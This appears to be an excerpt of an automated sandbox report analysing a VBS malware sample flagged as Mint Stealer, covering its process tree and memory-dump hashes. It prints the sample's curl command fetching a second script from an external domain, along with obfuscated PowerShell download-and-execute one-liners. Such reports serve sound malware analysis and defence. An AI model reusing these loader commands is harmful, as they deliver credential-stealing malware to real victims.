                                                                                                                              2024-12-17 15:32:10 UTC8000INData Raw: 6d 20 73 61 69 64 20 6c 65 66 74 20 74 68 65 20 73 61 76 65 64 20 54 4f 57 45 52 20 43 68 75 72 63 68 20 6c 61 73 74 20 65 78 65 72 63 69 73 69 6e 67 20 70 6f 6c 69 63 79 0a 2f 2f 66 72 6f 6d 20 63 6f 6e 63 65 72 6e 69 6e 67 20 68 69 73 74 6f 72 79 20 68 61 76 65 20 77 68 65 6e 20 65 6e 64 20 62 69 6f 67 72 61 70 68 79 20 68 69 73 74 6f 72 69 61 6e 20 62 6f 75 6e 64 20 74 68 65 20 74 68 61 74 20 66 6f 75 6e 64 20 70 6f 6c 69 63 79 20 54 68 65 20 74 68 61 74 20 63 61 72 65 20 54 68 65 20 6d 61 79 20 70 6f 6c 69 63 79 20 65 69 74 68 65 72 20 66 6f 72 65 62 65 61 72 73 20 43 68 75 72 63 68 20 74 68 65 20 53 63 6f 74 74 69 73 68 20 53 63 6f 74 74 69 73 68 20 61 6e 64 20 62 75 74 20 68 69 73 20 6d 61 74 74 65 72 73 20 68 69 73 20 4a 61 6d 65 73 0a 2f 2f 74 68
                                                                                                                              Data Ascii: m said left the saved TOWER Church last exercising policy//from concerning history have when end biography historian bound the that found policy The that care The may policy either forebears Church the Scottish Scottish and but his matters his James//th
                                                                                                                              2024-12-17 15:32:10 UTC8000INData Raw: 69 6f 6e 20 6e 61 74 75 72 61 6c 20 6e 6f 74 20 31 36 38 38 20 73 75 63 63 65 73 73 20 76 61 6c 75 65 20 67 72 65 61 74 20 74 68 65 20 6e 61 6d 65 20 6f 75 72 20 61 6e 64 20 74 68 65 20 43 4f 55 52 54 20 66 6f 72 20 62 65 65 6e 20 73 74 72 75 67 67 6c 65 20 43 48 41 50 54 45 52 20 6f 62 73 65 71 75 69 6f 75 73 20 70 72 65 66 65 72 72 65 64 20 65 66 66 65 63 74 20 61 6e 64 20 61 6e 64 20 69 6e 74 65 72 65 73 74 65 64 20 77 61 73 20 72 65 73 70 6f 6e 73 69 62 69 6c 69 74 79 20 6d 61 74 74 65 72 20 70 65 6f 70 6c 65 20 74 68 65 69 72 20 66 72 6f 6d 20 74 68 65 69 72 20 54 48 45 20 73 70 69 72 69 74 65 64 20 74 68 65 20 44 49 4e 47 49 4e 47 20 53 63 6f 74 20 74 68 61 74 20 68 69 67 68 20 68 61 73 20 61 64 76 61 6e 63 65 64 20 68 61 76 65 20 6f 6e 6c 79 20 6e
                                                                                                                              Data Ascii: ion natural not 1688 success value great the name our and the COURT for been struggle CHAPTER obsequious preferred effect and and interested was responsibility matter people their from their THE spirited the DINGING Scot that high has advanced have only n


                                                                                                                              Click to jump to process

                                                                                                                              Click to jump to process

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Click to jump to process

                                                                                                                              Target ID:0
                                                                                                                              Start time:10:31:58
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\67618a47ee8c5.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:2
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:3
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:4
                                                                                                                              Start time:10:31:59
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\curl.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:curl -k -o C:\Users\Public\67618a47ee8cd.vbs https://pko-download.kagyouth.co.ke/67618a47ee67a/67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff61b240000
                                                                                                                              File size:530'944 bytes
                                                                                                                              MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:moderate
                                                                                                                              Has exited:true

                                                                                                                              Target ID:5
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:6
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:7
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:8
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\cmd.exe" /V/D/c start C:\Users\Public\67618a47ee8cd.vbs
                                                                                                                              Imagebase:0x7ff64aa80000
                                                                                                                              File size:289'792 bytes
                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:9
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              Target ID:10
                                                                                                                              Start time:10:32:02
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\67618a47ee8cd.vbs"
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:12
                                                                                                                              Start time:10:32:08
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\iethuj.js
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:13
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Windows\System32\wscript.exe" //E:jscript C:\Users\user\AppData\Local\Temp\bmkvfo.js
                                                                                                                              Imagebase:0x7ff753260000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:14
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:conhost --headless powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:15
                                                                                                                              Start time:10:32:10
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell $nupqcmyikef='ur' ;new-alias printout c$($nupqcmyikef)l;$rhgdckzwb=(5296,5308,5304,5308,5303,5310,5291,5249,5315,5296,5244,5239,5309,5304,5305,5240,5242,5239,5305,5297,5305,5256,5308,5254,5302,5298,5303,5309,5308,5243,5242);$wcpdukmela=('bronx','get-cmdlet');$xpyktecohun=$rhgdckzwb;foreach($mtdgshwxfkuza in $xpyktecohun){$pqhkibc=$mtdgshwxfkuza;$iqmptoujlvgyh=$iqmptoujlvgyh+[char]($pqhkibc-5193);$tbjsczxqfh=$iqmptoujlvgyh; $wlupxmqob=$tbjsczxqfh};$yexnqzpivaugw[2]=$wlupxmqob;$xmdupkr='rl';$ocxjqszgpw=1;.$([char](9992-9887)+'e'+'x')(printout -useb $wlupxmqob)
                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2372828228.0000024EA213E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2374218432.0000024EA3D71000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 0000000F.00000002.2374218432.0000024EA4C69000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Target ID:16
                                                                                                                              Start time:10:32:11
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:conhost --headless powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              Target ID:17
                                                                                                                              Start time:10:32:11
                                                                                                                              Start date:17/12/2024
                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:powershell $tiznsomryjec='ur' ;new-alias printout c$($tiznsomryjec)l;$ikgytfezh=(2594,2606,2602,2606,2601,2608,2589,2547,2613,2594,2542,2537,2607,2602,2603,2538,2540,2537,2603,2595,2603,2554,2606,2552,2600,2596,2601,2607,2606,2541,2540);$erxbmnil=('bronx','get-cmdlet');$nfpekqwz=$ikgytfezh;foreach($mdovnxu in $nfpekqwz){$oycmishnj=$mdovnxu;$yozmvglx=$yozmvglx+[char]($oycmishnj-2491);$agflovwuqxrnek=$yozmvglx; $ptzlyfg=$agflovwuqxrnek};$fwlxzitsjno[2]=$ptzlyfg;$aphsdzmcr='rl';$bkgejqchs=1;.$([char](9992-9887)+'e'+'x')(printout -useb $ptzlyfg)
                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                              File size:452'608 bytes
                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2332748509.000001CA00222000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_MintStealer_1, Description: Yara detected Mint Stealer, Source: 00000011.00000002.2332748509.000001CA0111C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:true

                                                                                                                              Reset < >
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437267233.00007FFD34510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34510000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd34510000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ddb1e7099755bfedc76519fb3c5d961eb856c48034956faa40d65854b0dd0531
                                                                                                                                • Instruction ID: 35d060a7062ede43406b8fa5e230c2d45c41ebf5f4d465fd6b320e2c576f3458
                                                                                                                                • Opcode Fuzzy Hash: ddb1e7099755bfedc76519fb3c5d961eb856c48034956faa40d65854b0dd0531
                                                                                                                                • Instruction Fuzzy Hash: 9BE1B330E08A4D8FDF99DF5CC495AA97BE1FF59310F1441AAD449D7296CA28EC82CB81
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5633ac9f0dcd185b3b687e33ccb8b77ffbbb1b0168bec01cdf5e39a581b9da25
                                                                                                                                • Instruction ID: bc72b417b03ddc92660689e210070e270584908f3d22e47e13b60aa9f8474070
                                                                                                                                • Opcode Fuzzy Hash: 5633ac9f0dcd185b3b687e33ccb8b77ffbbb1b0168bec01cdf5e39a581b9da25
                                                                                                                                • Instruction Fuzzy Hash: 91D10772E0DA880FE766DA6888A56F67FD1EF47310F1801BFD18DC7193D919A846D341
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f8301b630c2471db5b4467a7b2432bf98a713484326e2c19c31a4e7f9687696c
                                                                                                                                • Instruction ID: 3160b84ca3c97de2e76d727d0311703709235243bc25a91a22a77955f89dcd30
                                                                                                                                • Opcode Fuzzy Hash: f8301b630c2471db5b4467a7b2432bf98a713484326e2c19c31a4e7f9687696c
                                                                                                                                • Instruction Fuzzy Hash: 7C318F23E0EBD60FE7A3967458A51957FE1AF57210B0D00FBC588CB1E3E85D5C8A8356
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 250db0758109bd757db12b4be98c79e38e063517224cf89e2fd308e2c09c45a2
                                                                                                                                • Instruction ID: 023231040d5e260faaec667a781c813938a4a69c1eb1dfe4ec2e60a9764f4ae0
                                                                                                                                • Opcode Fuzzy Hash: 250db0758109bd757db12b4be98c79e38e063517224cf89e2fd308e2c09c45a2
                                                                                                                                • Instruction Fuzzy Hash: B7110A32F0DA884FEBD2DF9C44A45A97BE2EF5A310B1801BED54CD7193DE28A841C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437267233.00007FFD34510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34510000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd34510000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 521195f6eba1550b0c87165e4f7b2e1ac971ce002f812ce5ee8d5842f7abb866
                                                                                                                                • Instruction ID: f8ca579f96c538a8284b5e374382e3afaa9865ed0b862b8421a5d7b80f24b1f5
                                                                                                                                • Opcode Fuzzy Hash: 521195f6eba1550b0c87165e4f7b2e1ac971ce002f812ce5ee8d5842f7abb866
                                                                                                                                • Instruction Fuzzy Hash: 7D01A73020CB0C4FDB44EF0CE091AA9B3E0FB85324F10052DE58AC36A1D636E881CB42
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.2437796699.00007FFD345E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345E0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_15_2_7ffd345e0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec499d304613af7eeb63ed86bfa69e438b00e0a6ba9dd1c29c735fe98a27d407
                                                                                                                                • Instruction ID: 5986e7b135c11751aee108d9abd8e34720eabcded6fc7ebc1235b1c6d9b44553
                                                                                                                                • Opcode Fuzzy Hash: ec499d304613af7eeb63ed86bfa69e438b00e0a6ba9dd1c29c735fe98a27d407
                                                                                                                                • Instruction Fuzzy Hash: 08E0D853B0FE894FD691AE5C2414169B7E1EB8A25131845FBE04DCB2D7DC1D5C494304
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 539fe76cdb9cc3f59b011513959d2eb65f043477a92765c9c0659343ae98e93e
                                                                                                                                • Instruction ID: 7d2c967da24ec835dad103482dd42a61d243a71d3b36cab57fddd18b93c1acc5
                                                                                                                                • Opcode Fuzzy Hash: 539fe76cdb9cc3f59b011513959d2eb65f043477a92765c9c0659343ae98e93e
                                                                                                                                • Instruction Fuzzy Hash: 44121731A08A4D8FDB94EF5CC4A5AA97BE1FF69310F1501B9D44DD72A6CA78EC42C780
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: bad9798df7076c50beaa0a826992b48dd48eddb2aac498d7fcb87ab996b0261e
                                                                                                                                • Instruction ID: cc5938c7239626e3ca27225ba645683f17f7a80dbb9b3921e035e72cbe113014
                                                                                                                                • Opcode Fuzzy Hash: bad9798df7076c50beaa0a826992b48dd48eddb2aac498d7fcb87ab996b0261e
                                                                                                                                • Instruction Fuzzy Hash: 7391F472E0DA895FE766DB6888A56B53BE1EF43310F0801BEE08DC71A3D929AC45C751
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 882d720723d40695a9d9a29c0b276a1bb7512363687d7a1a19155b61463bf847
                                                                                                                                • Instruction ID: bc2fca7da1f98b83ace03c825e39fdeb2895ae3f8ae4b919fed02481621eadc2
                                                                                                                                • Opcode Fuzzy Hash: 882d720723d40695a9d9a29c0b276a1bb7512363687d7a1a19155b61463bf847
                                                                                                                                • Instruction Fuzzy Hash: D5319163E4EBC60FE7979AB449A5058BFE1EF5762074A00FBC148CB0A3E91D5C499312
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ec560d6cb88a31dce96051aee3e2011363e89565a3ffc897a33df44a3b6d7a1c
                                                                                                                                • Instruction ID: e0ace073738f167f7cdee44aacf69b08250479112150a0505b1862641f76af0c
                                                                                                                                • Opcode Fuzzy Hash: ec560d6cb88a31dce96051aee3e2011363e89565a3ffc897a33df44a3b6d7a1c
                                                                                                                                • Instruction Fuzzy Hash: CB11E732F0DA884FEB92DE9844A55A97BD1EF56310B1401BEC54DE7193DA29AC41C351
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                                                                                                                • Instruction ID: a5c11c42cceb97d398a95e0c01fd2a3b0f036c92ec5647340fb3fee6ba62b4a3
                                                                                                                                • Opcode Fuzzy Hash: 827ffc17c68b4394729c7d3db2028b5df0b9573fb2b38fd978749fd0e3804eba
                                                                                                                                • Instruction Fuzzy Hash: B401A73120CB0C4FD744EF4CE091AA5B3E0FB95324F10052DE58AC36A5DA36E881CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2354039670.00007FFD345C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345C0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd345c0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 55a23f08e02b9b94fa7fd1c4c6148d5f03dcd9ee39b73ce3c71f4b21ba1c9d27
                                                                                                                                • Instruction ID: 017812ea1b146417f2e51f6dc816baa95c4940454945add482c04d6ce65d9766
                                                                                                                                • Opcode Fuzzy Hash: 55a23f08e02b9b94fa7fd1c4c6148d5f03dcd9ee39b73ce3c71f4b21ba1c9d27
                                                                                                                                • Instruction Fuzzy Hash: CDE0D813B0FEC94FD6916F5C245416477E0EB8A25131445FBE04DCB1D3DC1D4C084304
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_17_2_7ffd344f0000_powershell.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: N_^
                                                                                                                                • API String ID: 0-3769343188
                                                                                                                                • Opcode ID: d589691c702ae9720ad2e86f62ef435185e99fc364017f348a25d38adf3af588
                                                                                                                                • Instruction ID: 2f8e7620ef1049da0e2e055fbc1e221343412e09d67fe06f09bd57eb5d57d03c
                                                                                                                                • Opcode Fuzzy Hash: d589691c702ae9720ad2e86f62ef435185e99fc364017f348a25d38adf3af588
                                                                                                                                • Instruction Fuzzy Hash: E2719857F0D6E61BF3A2567C28F61E52F90DF531A670A00B7C784CE0D7AD5C68066392
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000011.00000002.2353705843.00007FFD344F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344F0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
